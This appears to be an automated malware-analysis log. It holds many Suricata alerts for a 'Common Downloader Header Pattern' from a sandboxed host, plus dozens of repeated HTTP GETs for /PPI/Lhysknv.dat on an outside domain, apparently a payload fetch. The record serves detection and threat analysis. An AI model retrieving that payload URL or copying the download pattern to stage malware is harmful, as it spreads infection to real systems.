Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49941 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49826 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49854 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49901 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49924 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49957 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49955 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49930 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49900 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49781 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49809 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49808 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49925 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49858 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49813 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49856 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49961 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49939 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49894 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49910 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49783 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49906 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49937 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49916 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49835 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49971 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49960 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49926 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49873 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49890 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49975 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49882 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49799 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49963 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49945 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49881 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49834 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49950 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49940 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49923 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49863 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49985 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49908 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49981 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49983 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49811 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49989 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49819 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49958 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49946 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49909 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49995 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49934 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49966 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50000 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49978 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50002 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49911 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49993 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49928 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49815 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49990 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49974 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49840 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49938 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50003 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49948 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49976 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49788 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49994 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49973 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49992 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49970 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49919 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49871 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49861 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49927 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49874 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49931 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49912 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49969 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49844 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49997 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49891 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49984 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50001 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49804 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49991 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49895 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49932 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49982 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49968 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49987 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49853 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49959 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49869 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49949 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49898 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49921 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49988 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49820 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49999 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49944 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49929 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49954 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49972 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49897 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49953 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49986 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49967 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49905 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49956 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49870 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49902 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49812 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49998 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49965 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49952 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49964 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49962 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49847 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49917 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49879 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49996 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49977 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49980 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49880 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49951 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49888 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49979 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49943 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50004 -> 188.114.96.3:443
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
Source: global trafficHTTP traffic detected: GET /PPI/Lhysknv.dat HTTP/1.1Host: www.vascocorretora.com.br
